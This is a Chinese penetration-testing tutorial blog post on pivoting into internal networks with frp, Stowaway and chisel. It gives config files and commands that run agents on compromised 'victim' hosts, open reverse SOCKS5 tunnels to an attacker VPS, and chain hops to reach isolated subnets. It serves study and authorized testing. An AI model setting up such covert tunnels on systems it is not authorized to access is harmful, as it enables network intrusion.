内网渗透学习-内网代理工具使用

admin 2025年5月26日11:11:50评论32 views字数 4076阅读13分35秒阅读模式

记录几个比较好用的内网穿透工具

frp

这个是比较早的一款内网穿透工具了

一级代理

服务端(我们的VPS)**frps.toml**配置

完整的配置可参考 frps_full_example.toml

bindPort = 49378auth.token = "helloxx.6haha7789"

启动服务端命令./frps -c frps.toml 这里用toml配置文件是因为改版了ini配置文件在4.0的版本适用。

客户端(shell机器)**frpc.toml**配置

完整配置可参考 frpc_full_example.toml

serverAddr = "1.2.3.4" serverPort = 49378auth.token = "helloxx.6haha7789"[[proxies]]name = "plugin_socks5"type = "tcp"remotePort = 60051[proxies.plugin]type = "socks5"username = "0HDFt16cLQJCB"password = "JTN276Gp1A"

启动客户端命令./frpc -c frpc.toml连接成功后,通过 socks5://<用户名>:<密码>@<服务端IP地址>:<服务端端口> 就可以直接代理进入到目标的内网了,可以访问任意内网资源、发起内网请求等。

多级代理

在实战中,我们拿下了内网机器A,通过内网机器A又拿下了内网机器B,但发现内网机器A不通172段,内网机器B通172段但不出网,这时我们想要通过VPS构建socks5隧道访问到172段,就需要建立多级代理;简单图示如下:

内网渗透学习-内网代理工具使用
img

服务端(外网VPS)配置frps.toml一级代理 一致

bindPort = 49378auth.token = "helloxx.6haha7789"

由于客户端1(内网机器A)需要充当中转作用,即对于外网VPS来说是客户端,对于内网机器B来说是服务端,因此存在有2份配置文件,分别启动客户端和服务端。

其中服务端配置 frps.toml 如下:

bindPort = 49378

客户端配置frpc.toml如下:

serverAddr = "1.2.3.4" # 改为 VPS 的 IP 地址serverPort = 49378auth.token = "helloxx.6haha7789"[[proxies]]name = "plugin_socks5"type = "tcp"remotePort = 60051[proxies.plugin]type = "socks5"username = "0HDFt16cLQJCB"password = "JTN276Gp1A"[[proxies]]name = "portforward"type = "tcp"localIP = "127.0.0.1"remotePort = 60052 # 别和上方的remotePort冲突就行localPort = 6000 # 把本地的6000端口映射出去

接下来在客户端2(内网机器B)上配置 frpc.toml 如下,和客户端1(内网机器A)建立隧道。

serverAddr = "1.2.3.5" # 改为 内网机器A 的地址serverPort = 49378[[proxies]]name = "plugin_socks5_two"type = "tcp"remotePort = 6000 # 修改为上面的 localPort,表明通过 内网机器A 的该端口可以访问到当前的内网[proxies.plugin]type = "socks5"username = "0HDFt16cLQJCB"password = "JTN276Gp1A"

这样一套启动下来后,通过外网VPS socks5://<账号>:<密码>@<外网VPS IP地址>:60052 就可以访问到客户端2(内网机器B)的内网了。

Stowaway

Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具,用户可使用此程序将外部流量通过多个节点代理至内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能;用于解决frp,nps等工具在搭建多级代理时操作过于复杂不便管理的问题。

一级代理

目标内网全部连通,只需要构建隧道进入到内网即可访问到所有的资源。

在服务端(VPS)启动:

./stowaway_linux_x64_admin --heartbeat -l 61032 -s aab32

在被控端(shell机器)启动:

./stowaway_macos_x64_agent -c <VPS IP地址>:61032 -s aab32

建立连接后,在服务端选中上线的节点,并且执行socks命令即可。

use 0# socks 端口 用户名 密码socks 55667 username password

此时使用 socks5://username:password@<VPS IP>:55667 就可以代理到被控端的内网了。

多级代理

外网VPS上执行:

./stowaway_linux_x64_admin --heartbeat -l 61032 -s aab32

内网机器A上执行:

./stowaway_linux_x64_admin -c <VPS IP地址>:61032 -s aab32

这时候外网VPS和内网机器A已经建立连接了,进入内网机器A的node节点,执行listen监听端口

use 0listen
内网渗透学习-内网代理工具使用
img

此时再在内网机器B上执行如下命令和内网机器A建立连接:

./stowaway_macos_x64_agent -c <内网机器A IP地址>:23123 -s aab32

执行后可以在外网VPS上看到内网机器B已经上线,这个时候进入该节点再执行socks命令开启代理即可:

use 1socks 55667 username password

此时即可通过 socks5://username:password@<VPS IP>:55667 访问到内网机器B的内网了。

chisel

chisel是一款基于HTTP的快速TCP/UDP隧道工具,具有SSH加密和断开重连机制,使用Go语言编写,支持多平台,且单一文件无依赖。该工具可以在攻击者和受害者之间建立连接,用于代理和访问特定端口。通过设置socks5代理,可以访问内部服务器。该工具还支持反向连接和二级代理。

一级代理

攻击者(kali): 192.168.6.131受害者(windows): 192.168.6.129

拓扑如下:

攻击者(192.168.6.131)<–> 受害者(192.168.6.129,10.1.1.1)< – > 内部服务器 (10.1.1.2)

目标访问: 10.1.1.2

正向连接(socks)

跳板机(受害者)

./chisel server -p 12345
内网渗透学习-内网代理工具使用
img

攻击者

./chisel client 192.168.6.129:12345 socks
内网渗透学习-内网代理工具使用
img

socks 代理绑定在了 1080 端口上,本地只要设置 socks5 代理就可以访问。

反向连接

攻击者(黑客)

./chisel server -p 12345 --reverse --socks5

跳板机(受害者)

chisel.exe client 192.168.6.128:12345 R:socks

此时攻击者通过设置socks代理就可以访问10.1.1.2的服务了

多级代理

内网渗透学习-内网代理工具使用
img

访问特定端口

attack kali:

chisel  server -p 3333 --reverse

web01:

开启两个终端,既要运行 client 也要运行 server

chisel server -p 2222 --reversechisel client 192.168.126.132:3333 R:1111:127.0.0.1:5555

这里解释一下这里的R:1111是什么意思,指的是在kali端开启1111端口也就是说kali端开启socks代理通过访问1111就会访问到web01端的5555的端口上。

web02:

chisel client 192.168.150.128:2222 R:5555:192.168.59.129:80

这里的R:5555的意思也很明显就是在web01开启5555端口当访问web01的5555端口就能访问到web02的80端口所以在 kali 上访问 127.0.0.1:1111,即可访问 192.168.59.129 的 80 端口。

socks代理

kali:

chisel server -p 3333 --reverse

web01:

开启两个终端,既要运行 client 也要运行 server

chisel server -p 2222 --reverse --socks5chisel client 192.168.126.132:3333 R:1111:socks

web02:

chisel client 192.168.150.128:2222 R:5555:socks

proxychains.conf 文件设置代理链

socks5 127.0.0.1 1111socks5 127.0.0.1 5555

后续如果还有多级代理只需重复在web01上的步骤即可然后记得要在proxychains.conf添加上代理链 参考: https://f0rget.me/2023/09/02/chisel-proxy/ https://lca.xlog.page/chisel-dai-li-gong-ju?locale=zhhttps://blog.gm7.org/%E4%B8%AA%E4%BA%BA%E7%9F%A5%E8%AF%86%E5%BA%93/01.%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/12.%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/03.%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/03.%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F.html#%E4%B8%80%E7%BA%A7%E4%BB%A3%E7%90%86

原文始发于微信公众号(0xh4ck3r):内网渗透学习-内网代理工具使用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月26日11:11:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透学习-内网代理工具使用https://cn-sec.com/archives/4098414.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息